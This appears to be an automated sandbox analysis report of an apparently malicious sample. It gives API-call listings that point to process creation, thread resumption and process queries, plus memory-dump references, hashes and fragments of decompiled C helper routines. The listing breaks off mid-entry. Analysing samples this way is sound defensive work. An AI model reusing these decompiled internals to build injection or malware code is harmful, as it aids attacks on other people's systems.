                               Instruction addresses: 0x049d78ad, 0x049d78b2, 0x049d78c0, 0x049d78c6, 0x049d78ca, 0x049d793b, 0x049d78cc, 0x049d78d0, 0x049d78d3, 0x049d78d6, 0x049d78dd, 0x049d78de, 0x049d78df, 0x049d78e3, 0x049d78e6, 0x049d78ed, 0x049d78f3, 0x049d78f4, 0x049d78f4, 0x049d78fb, 0x049d78fc, 0x049d78fd, 0x049d7901, 0x049d790d, 0x049d7913, 0x049d7914, 0x049d7914, 0x049d7916, 0x049d791c, 0x049d791e, 0x049d7923, 0x049d7924, 0x049d7924, 0x049d792a, 0x049d7933, 0x049d7935, 0x049d7938, 0x049d7947

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 049D78C0
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 6db4e84bbf5c7ff1a4823351a13d94db49323ce420724652f6191e3f94e08aa9
                              • Instruction ID: b70af1c5eddeb8ae14f2e2db393f15d0c906a88648b5229891633aa93c8b59f8
                              • Opcode Fuzzy Hash: 6db4e84bbf5c7ff1a4823351a13d94db49323ce420724652f6191e3f94e08aa9
                              • Instruction Fuzzy Hash: 31112972686344AFEB058F6DC491BE97FA9DB13358F1480EEE4808B292C277950BC760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleA.KERNEL32(?,00000003,053EF514,00000000,011075A8,?,053CB24B,00000004,00000000), ref: 053E35F1
                                • Part of subcall function 053E4582: NtQueryInformationProcess.NTDLL(00000000,053CB24B,00000018,00000000,053F0460), ref: 053E4599
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HandleInformationModuleProcessQuery
                              • String ID:
                              • API String ID: 2776635927-0
                              • Opcode ID: 07af86b7a27ce13d461ae9e7d6dca8d5b252a6947a6fb784c6d3697f84f9ec0f
                              • Instruction ID: 8027559d7e8bde2c803f6036ae9787336a009387c07e361995721771f941dd1f
                              • Opcode Fuzzy Hash: 07af86b7a27ce13d461ae9e7d6dca8d5b252a6947a6fb784c6d3697f84f9ec0f
                              • Instruction Fuzzy Hash: 22211D75600615AFDF20CF69C5C497A77E9FF462A0B144C69E99A8B390DAB1F900CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 053C1444
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CreateProcess
                              • String ID:
                              • API String ID: 963392458-0
                              • Opcode ID: 4461dc33ef95121a0bc6764b3b5c2b322a40ab468bc9fc5392b3916a8b31dd35
                              • Instruction ID: de59309e7cd41e748c477a41fad0c4f3e0fd53601e40b72b04c29c965751a85c
                              • Opcode Fuzzy Hash: 4461dc33ef95121a0bc6764b3b5c2b322a40ab468bc9fc5392b3916a8b31dd35
                              • Instruction Fuzzy Hash: 1B11393220020AAFCF019FA9DC409DA7FA9FF08260B058169FE19A6161C771DC31EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 34%
                              			E049D3196(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                              				intOrPtr _v12;
                              				void* _v18;
                              				short _v20;
                              				intOrPtr _t15;
                              				short _t17;
                              				intOrPtr _t19;
                              				short _t23;
                              
                              				_t23 = 0;
                              				_v20 = 0;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosw");
                              				_t15 =  *0x49dd2b8; // 0xe3a5a8
                              				_t4 = _t15 + 0x49de39c; // 0x5818944
                              				_t20 = _t4;
                              				_t6 = _t15 + 0x49de124; // 0x650047
                              				_t17 = E049D5A5E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                              				if(_t17 < 0) {
                              					_t23 = _t17;
                              				} else {
                              					if(_v20 != 8) {
                              						_t23 = 1;
                              					} else {
                              						_t19 = E049D6794(_t20, _v12);
                              						if(_t19 == 0) {
                              							_t23 = 8;
                              						} else {
                              							 *_a16 = _t19;
                              						}
                              						__imp__#6(_v12);
                              					}
                              				}
                              				return _t23;
                              			}

                               Instruction addresses: 0x049d31a0, 0x049d31a2, 0x049d31a9, 0x049d31aa, 0x049d31ab, 0x049d31ac, 0x049d31b2, 0x049d31b7, 0x049d31b7, 0x049d31c1, 0x049d31d3, 0x049d31da, 0x049d3209, 0x049d31dc, 0x049d31e1, 0x049d3206, 0x049d31e3, 0x049d31e6, 0x049d31ed, 0x049d31f8, 0x049d31ef, 0x049d31f2, 0x049d31f2, 0x049d31fc, 0x049d31fc, 0x049d31e1, 0x049d3210

                              APIs
                                • Part of subcall function 049D5A5E: SysFreeString.OLEAUT32(?), ref: 049D5B3D
                                • Part of subcall function 049D6794: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,049D3D8B,004F0053,00000000,?), ref: 049D679D
                                • Part of subcall function 049D6794: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,049D3D8B,004F0053,00000000,?), ref: 049D67C7
                                • Part of subcall function 049D6794: memset.NTDLL ref: 049D67DB
                              • SysFreeString.OLEAUT32(00000000), ref: 049D31FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeString$lstrlenmemcpymemset
                              • String ID:
                              • API String ID: 397948122-0
                              • Opcode ID: 6edcf46264b0983d34d7d84c1221717f2ff8f438093f256d01e06e8f7597a338
                              • Instruction ID: 28d97d09bc25239f5c33a6c9ecaf86a4bfb7ea5656b543acf3c8e64c3520643b
                              • Opcode Fuzzy Hash: 6edcf46264b0983d34d7d84c1221717f2ff8f438093f256d01e06e8f7597a338
                              • Instruction Fuzzy Hash: D2017532500129BFDF219F98CD05DAEBBB9FB48714F008935EE15E6060E370B955CB92
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D9288: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92A7
                                • Part of subcall function 053D9288: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,053F01F4,00000000,053CB176,?,053C145C,?), ref: 053D92B2
                                • Part of subcall function 053D9288: _wcsupr.NTDLL ref: 053D92BF
                                • Part of subcall function 053D9288: lstrlenW.KERNEL32(00000000), ref: 053D92C7
                              • ResumeThread.KERNEL32(00000004,?,053C145C,?), ref: 053CB184
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                              • String ID:
                              • API String ID: 3646851950-0
                              • Opcode ID: 6eef6018e56694d358097bdb01943b9fd2eb3421eb82574b62e2dede6fcf8565
                              • Instruction ID: eafb53cde9606c2dc82b216d4fb9dbc782788f8801bfadebe02234915d161200
                              • Opcode Fuzzy Hash: 6eef6018e56694d358097bdb01943b9fd2eb3421eb82574b62e2dede6fcf8565
                              • Instruction Fuzzy Hash: AED05E36204345A6DA225620CE0BF26FEE3AF40B88F44885DF98A44060C7B28C14A715
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 053E8560
                                • Part of subcall function 053E86A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,053C0000), ref: 053E8722
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2890b7da0169951c9cc0772c5e5f153a34bc1e75bcbf56cddcd055335a689f05
                              • Instruction ID: 9a3234c7ea5a29a824fd9bcb1f4b222a474182ee806e32cb68c1c7c91b3b10eb
                              • Opcode Fuzzy Hash: 2890b7da0169951c9cc0772c5e5f153a34bc1e75bcbf56cddcd055335a689f05
                              • Instruction Fuzzy Hash: ADA011E2BAA222BC3808A3023C2AC3B828CC0C0A20330880AE802A00C0ACA00C020032
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___delayLoadHelper2@8.DELAYIMP ref: 053E8560
                                • Part of subcall function 053E86A9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,0002C5B4,053C0000), ref: 053E8722
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ExceptionHelper2@8LoadRaise___delay
                              • String ID:
                              • API String ID: 123106877-0
                              • Opcode ID: 2fd38d8ec5fc73e225db0cabea626358f4d8447dd7cb9a2299a3406d604118ff
                              • Instruction ID: 2d6b0752129f1a07179683c18b69b27733531fd7cedf7a67fff3bf4abe99965d
                              • Opcode Fuzzy Hash: 2fd38d8ec5fc73e225db0cabea626358f4d8447dd7cb9a2299a3406d604118ff
                              • Instruction Fuzzy Hash: 2BA002D57E51657C750453557D2DC7B869DC4D19113305559F511A44C05D501D461135
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D55DC(long _a4) {
                              				void* _t2;
                              
                              				_t2 = RtlAllocateHeap( *0x49dd270, 0, _a4); // executed
                              				return _t2;
                              			}

                               Instruction addresses: 0x049d55e8, 0x049d55ee

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000,049D552C), ref: 049D55E8
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                               • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                               • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                               • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: ada8b5bf8815ddde3b37d4368863fc9366d08b6aeebb5f40083d8589b6a5d708
                              • Instruction ID: ea160051772054de164278588839c55561a9cf2e5943fff59cc027a6fc95af65
                              • Opcode Fuzzy Hash: ada8b5bf8815ddde3b37d4368863fc9366d08b6aeebb5f40083d8589b6a5d708
                              • Instruction Fuzzy Hash: 85B012B514A100BBDE114F90DF04F057E31F750700F004031F30414060C2354C60EB04
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,?,053C62C2,00000000), ref: 053E69FC
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FreeHeap
                              • String ID:
                              • API String ID: 3298025750-0
                              • Opcode ID: debd8a5eccaceefd7a0750ede8da878f7aac1cb548e9645ffbef79ed9d5717c6
                              • Instruction ID: 0ec3dc23322c734a3052f3aa50d7860814386ed00e70f84f4c1331ad9f7c824b
                              • Opcode Fuzzy Hash: debd8a5eccaceefd7a0750ede8da878f7aac1cb548e9645ffbef79ed9d5717c6
                              • Instruction Fuzzy Hash: C3B012B5110300ABCB524B00DF0EF057F66A790704F004010B3094C0B08E320820EB05
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: c6e34df155e9c4916800fed23dbffc4945ef98a01131f31c895bf6b1639d273b
                              • Instruction ID: 6fdd09459114dca7aff406e2dfc0f552a5aec1acc279364eb74489c12e230bc2
                              • Opcode Fuzzy Hash: c6e34df155e9c4916800fed23dbffc4945ef98a01131f31c895bf6b1639d273b
                              • Instruction Fuzzy Hash: F5B012B5010200EBCFA24B00DD0EF057F66A750700F008010B2064C1F08B311820EB15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D2363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                              				void* _v8;
                              				int _v12;
                              				char _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				intOrPtr _v28;
                              				char _v32;
                              				char _v144;
                              				int _v148;
                              				intOrPtr _v152;
                              				intOrPtr _v156;
                              				intOrPtr _v160;
                              				char _v164;
                              				void* _t37;
                              				void* _t42;
                              				void* _t51;
                              				int _t53;
                              				void* _t60;
                              				void* _t63;
                              				void* _t64;
                              
                              				_t53 = 0;
                              				_t60 = __ecx;
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v8 = 0;
                              				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                              					L21:
                              					return _t53;
                              				} else {
                              					_t58 =  &_v164;
                              					_t37 = E049DA483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                              					if(_t37 != 0) {
                              						goto L21;
                              					}
                              					_t61 = _t60 - 0x80;
                              					if(_v148 > _t60 - 0x80) {
                              						goto L21;
                              					}
                              					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                              						_t37 = _t37 + 1;
                              						if(_t37 < 0x10) {
                              							continue;
                              						}
                              						_t53 = _v148;
                              						_t51 = E049D55DC(_t53);
                              						_t73 = _t51;
                              						_v8 = _t51;
                              						if(_t51 != 0) {
                              							_t53 = 0;
                              							L18:
                              							if(_t53 != 0) {
                              								goto L21;
                              							}
                              							L19:
                              							if(_v8 != 0) {
                              								E049D6DFA(_v8);
                              							}
                              							goto L21;
                              						}
                              						memcpy(_t51, _a4, _t53);
                              						L8:
                              						_t63 = _v8;
                              						E049D6B8E(_t58, _t73, _t63, _t53,  &_v32);
                              						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                              							L15:
                              							_t53 = 0;
                              							goto L19;
                              						} else {
                              							 *_a8 = _t63;
                              							goto L18;
                              						}
                              					}
                              					_t42 = E049D6E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
                              					__eflags = _t42;
                              					if(_t42 != 0) {
                              						_t53 = _v12;
                              						goto L18;
                              					}
                              					_t53 = _v148;
                              					__eflags = _v12 - _t53;
                              					if(__eflags >= 0) {
                              						goto L8;
                              					}
                              					goto L15;
                              				}
                              			}

                               Instruction addresses: 0x049d236e, 0x049d2371, 0x049d237a, 0x049d237d, 0x049d2380, 0x049d2383, 0x049d247c, 0x049d2480, 0x049d2395, 0x049d23a1, 0x049d23a8, 0x049d23af, 0x00000000, 0x00000000, 0x049d23b5, 0x049d23bd, 0x00000000, 0x00000000, 0x049d23c3, 0x049d23cc, 0x049d23d0, 0x00000000, 0x00000000, 0x049d23d2, 0x049d23d9, 0x049d23de, 0x049d23e0, 0x049d23e3, 0x049d2461, 0x049d2468, 0x049d246a, 0x00000000, 0x00000000, 0x049d246c, 0x049d2470, 0x049d2475, 0x049d2475, 0x00000000, 0x049d2470, 0x049d23ea, 0x049d23f2, 0x049d23f2, 0x049d23fb, 0x049d2409, 0x049d245d, 0x049d245d, 0x00000000, 0x049d242c, 0x049d242f, 0x00000000, 0x049d242f, 0x049d2409, 0x049d2449, 0x049d244e, 0x049d2450, 0x049d2465, 0x00000000, 0x049d2465, 0x049d2452, 0x049d2458, 0x049d245b, 0x00000000, 0x00000000, 0x00000000, 0x049d245b

                              APIs
                              • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 049D23EA
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction ID: 9eff4fdd35f204daffa16c763cd744ce7476808d6b0d17098dea3d1aba23dd7c
                              • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                              • Instruction Fuzzy Hash: 9C312975A00219EFEF21DFA4C880BEEB7B9AF44344F10C4F9E959A7140D670AE85CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053CCB7E
                                • Part of subcall function 053CC50B: memcpy.NTDLL(?,?,00000000,?,?,?,00000000), ref: 053CC52D
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: HeapQueryValue$AllocateCloseFreememcpy
                              • String ID:
                              • API String ID: 1301464996-0
                              • Opcode ID: 5f39ab478a6b352ee47bc7dbded9c2e50bcce00b69f4cb98fdac657eb0f77d0d
                              • Instruction ID: 84d8ff34caeafa666d34b1652e82e3ec6a6e1d6e91586d602acec8c55085729b
                              • Opcode Fuzzy Hash: 5f39ab478a6b352ee47bc7dbded9c2e50bcce00b69f4cb98fdac657eb0f77d0d
                              • Instruction Fuzzy Hash: 6211C176610209ABCB19DB98DCD5EBD7FB9EB48310F0010BDFA169B641DAB0AD008B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(053D3C99,053F0384,00000018,053CD760,064F8DBA,?,053CD760,064F8DBA,?,053CD760,064F8DBA,?,?,053D3C99,?,053CD760), ref: 053DC9A0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID:
                              • API String ID: 3510742995-0
                              • Opcode ID: 855c65b71327f5ce16ad324218d3d8e1607bd4b6b512aeec9381d90744a266fe
                              • Instruction ID: 258e4b7b3f5a16a7101ee3d51ff6b28fc69804de6cb0adbab2b5f9891184da56
                              • Opcode Fuzzy Hash: 855c65b71327f5ce16ad324218d3d8e1607bd4b6b512aeec9381d90744a266fe
                              • Instruction Fuzzy Hash: B2112C73620108ABC758DF99FC9AC6A7FE9F780310F154167F54B8B192EA706901DB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 053C318C
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C882D
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,00000020,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C883C
                                • Part of subcall function 053CAF6F: CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 053CAF95
                                • Part of subcall function 053CAF6F: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 053CAFA1
                                • Part of subcall function 053CAF6F: GetModuleHandleA.KERNEL32(?,064F96FC,00000000,?,00000000), ref: 053CAFC1
                                • Part of subcall function 053CAF6F: GetProcAddress.KERNEL32(00000000), ref: 053CAFC8
                                • Part of subcall function 053CAF6F: Thread32First.KERNEL32(?,0000001C), ref: 053CAFD8
                                • Part of subcall function 053CAF6F: CloseHandle.KERNEL32(?), ref: 053CB020
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
                              • String ID:
                              • API String ID: 2627809124-0
                              • Opcode ID: d6a096a22edd76a2b214ba4bfb36e4a3d783629b894cee5401e93fe6f5d71aa9
                              • Instruction ID: b5498c6e3820a13a832ffbd9ac295ae13e13bc5400beb7170ec709698fbfb734
                              • Opcode Fuzzy Hash: d6a096a22edd76a2b214ba4bfb36e4a3d783629b894cee5401e93fe6f5d71aa9
                              • Instruction Fuzzy Hash: 2E01A2B5620208BFDB16EBA9DD8DC9FBFECEB04358B004099F402A7211DE75AE01C760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E32FF: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3337
                                • Part of subcall function 053E32FF: RtlAllocateHeap.NTDLL(00000000,?), ref: 053E334B
                                • Part of subcall function 053E32FF: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,053C3136,?), ref: 053E3365
                                • Part of subcall function 053E32FF: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,?,053C3136,?,?,?), ref: 053E338F
                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 053D2F00
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C882D
                                • Part of subcall function 053C881B: StrChrA.SHLWAPI(?,00000020,?,00000000,053C3177,00000000,?,00000000,?,?,?,?,?,?), ref: 053C883C
                                • Part of subcall function 053CFD22: lstrlen.KERNEL32(?,?,00000000,00000000,053DD9EF,00000011,?,00000001,00000000,?,-00000008), ref: 053CFD52
                                • Part of subcall function 053CFD22: RtlAllocateHeap.NTDLL(00000000,-00000008,?), ref: 053CFD68
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,?,00000000), ref: 053CFD9E
                                • Part of subcall function 053CFD22: memcpy.NTDLL(00000010,00000000,?), ref: 053CFDB9
                                • Part of subcall function 053CFD22: CallNamedPipeA.KERNEL32(00000000,-00000008,?,00000010,00000028,00000001), ref: 053CFDD7
                                • Part of subcall function 053CFD22: GetLastError.KERNEL32 ref: 053CFDE1
                                • Part of subcall function 053CFD22: HeapFree.KERNEL32(00000000,00000000), ref: 053CFE04
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
                              • String ID:
                              • API String ID: 730886825-0
                              • Opcode ID: 510a7f31a90d5aef07ce0945cecfe4c6a9c20bc4f74b1af16d65aea2dd0da381
                              • Instruction ID: 0955b68e8f56ad1f2a5c2788e7f04eb6e5d5c6801490c279cc956d097b134203
                              • Opcode Fuzzy Hash: 510a7f31a90d5aef07ce0945cecfe4c6a9c20bc4f74b1af16d65aea2dd0da381
                              • Instruction Fuzzy Hash: F8015E35620214BBDB26DB58DD0EF9FBBFCEB04754F100095F502AB180DAB0BA00D761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • memset.NTDLL ref: 053C6C3F
                                • Part of subcall function 053CEA7F: memset.NTDLL ref: 053CEAA5
                                • Part of subcall function 053CEA7F: memcpy.NTDLL ref: 053CEACD
                                • Part of subcall function 053CEA7F: GetLastError.KERNEL32(00000010,00000218,053E8D4D,00000100,?,00000318,00000008), ref: 053CEAE4
                                • Part of subcall function 053CEA7F: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,053E8D4D,00000100), ref: 053CEBC7
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLastmemset$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 4290293647-0
                              • Opcode ID: 2656f5ff240f779af9815212aee6455aa81f847336e29ddf3389fb4fe70ce908
                              • Instruction ID: 728406b53e349da7bfbd8f61870a7ded0d1713ae9824efc70d57f6578d8d9bbb
                              • Opcode Fuzzy Hash: 2656f5ff240f779af9815212aee6455aa81f847336e29ddf3389fb4fe70ce908
                              • Instruction Fuzzy Hash: 7B01ADB16027186BC721DF2CE849B9A7FE8EF45614F008569FC58A6241D7B0DD1487A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D4FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                              				void* _t17;
                              
                              				if(_a4 == 0) {
                              					L2:
                              					return E049D88FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                              				}
                              				_t17 = E049D262B(_a4, _a8, _a12, _a16, _a20); // executed
                              				if(_t17 != 0) {
                              					goto L2;
                              				}
                              				return _t17;
                              			}

                              0x049d4fa8
                              0x049d4fc2
                              0x00000000
                              0x049d4fde
                              0x049d4fb9
                              0x049d4fc0
                              0x00000000
                              0x00000000
                              0x049d4fe5

                              APIs
                              • lstrlenW.KERNEL32(?,?,?,049D4AAE,3D049DC0,80000002,049D6096,049DA6E1,74666F53,4D4C4B48,049DA6E1,?,3D049DC0,80000002,049D6096,?), ref: 049D4FC5
                                • Part of subcall function 049D262B: SysAllocString.OLEAUT32(049DA6E1), ref: 049D2645
                                • Part of subcall function 049D262B: SysFreeString.OLEAUT32(00000000), ref: 049D2685
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFreelstrlen
                              • String ID:
                              • API String ID: 3808004451-0
                              • Opcode ID: d6acfc9fd0726fc3cad38cc639b17ed7e0ba01e6435ade87b6988a719b98de5c
                              • Instruction ID: 6a4d79aa744fcd64c9f3d0b264acc25664737b200cb33153a0f4c726e1b95a16
                              • Opcode Fuzzy Hash: d6acfc9fd0726fc3cad38cc639b17ed7e0ba01e6435ade87b6988a719b98de5c
                              • Instruction Fuzzy Hash: 20F0923204420EBFDF06AF94DC05EAA3F6AEF08394F048025FA1454071DB32E9B1EBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D6A16(void* __edi, void* _a4) {
                              				int _t7;
                              				int _t12;
                              
                              				_t7 = E049D60DD(__edi, _a4,  &_a4); // executed
                              				_t12 = _t7;
                              				if(_t12 != 0) {
                              					memcpy(__edi, _a4, _t12);
                              					 *((char*)(__edi + _t12)) = 0;
                              					E049D6DFA(_a4);
                              				}
                              				return _t12;
                              			}

                              0x049d6a22
                              0x049d6a27
                              0x049d6a2b
                              0x049d6a32
                              0x049d6a3d
                              0x049d6a41
                              0x049d6a41
                              0x049d6a4a

                              APIs
                                • Part of subcall function 049D60DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 049D6113
